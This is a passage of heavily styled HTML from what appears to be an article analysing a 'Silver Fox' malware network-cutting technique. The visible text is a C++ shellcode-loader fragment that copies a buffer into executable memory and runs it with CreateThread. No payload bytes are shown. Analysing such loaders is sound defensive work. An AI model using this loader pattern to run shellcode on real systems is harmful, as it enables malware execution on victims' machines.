11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">exec</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">cerr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;[-] VirtualAlloc failed</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">memcpy</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">exec, buf, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">buf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">));</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">cout </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;[+] Shellcode copied to memory, creating thread...</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HANDLE thread </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CreateThread</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">LPTHREAD_START_ROUTINE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">exec, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">thread</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">cerr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;[-] CreateThread failed</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">VirtualFree</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">exec, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0, MEM_RELEASE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WaitForSingleObject</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">thread, INFINITE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: 